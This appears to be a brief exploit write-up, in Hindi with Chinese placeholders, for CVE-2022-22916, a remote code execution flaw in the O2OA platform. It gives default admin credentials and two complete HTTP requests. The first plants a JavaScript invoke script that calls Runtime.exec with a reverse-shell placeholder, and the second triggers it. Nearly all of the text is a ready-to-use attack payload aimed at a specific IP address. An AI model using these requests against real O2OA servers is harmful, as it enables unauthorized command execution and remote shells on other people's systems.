
CVE-2022-22916,O2OA RCE दूरस्थ कमांड निष्पादन
CVE-2022-22916, O2OA RCE दूरस्थ कमांड निष्पादन
O2OA J2EE वितरित आर्किटेक्चर पर आधारित, मोबाइल ऑफिस और स्मार्ट ऑफिस को एकीकृत करने वाला, निजीकृत तैनाती का समर्थन करने वाला, अनुकूली लोड क्षमता वाला, और AGPL लाइसेंस के तहत ओपन-सोर्स एंटरप्राइज सूचना प्रणाली अनुकूलन विकास प्लेटफॉर्म समाधान है, जो सॉफ्टवेयर विकास लागत को काफी हद तक बचाता है। /x_program_center/jaxrs/invoke के माध्यम से, O2OA v6.4.7 में एक दूरस्थ कोड निष्पादन (RCE) दोष पाया गया है।
खाता xadmin/o2 में लॉग इन करें Authorization प्राप्त करें
POST /x_program_center/jaxrs/invoke?v=6.3 HTTP/1.1
Host: 123.58.236.76:33455
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Authorization: 你的Authorization
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 475
{"name":"aodsec","id":"aodsec","alias":"","description":"","isNewInvoke":true,"text":"\nvar p = java.lang.Runtime.getRuntime().exec('反弹shell命令');\nvar sc = new java.util.Scanner(p.getInputStream(),\"GBK\").useDelimiter(\"\\\\A\");\nvar result = sc.hasNext() ? sc.next() : \"\";\nsc.close();","enableToken":false,"enable":true,"remoteAddrRegex":"","lastStartTime":"","lastEndTime":"","validated":true}
POST /x_program_center/jaxrs/invoke/aodsec/execute?v=6.3 HTTP/1.1
Host: 123.58.236.76:43953
Content-Length: 0
Accept: text/html,application/json,*/*
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN
Authorization: 你的Authorization
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Content-Type: application/json; charset=UTF-8
Origin: http://123.58.236.76:43953
Referer: http://123.58.236.76:43953/x_desktop/index.html
Accept-Encoding: gzip, deflate
Cookie:
Connection: close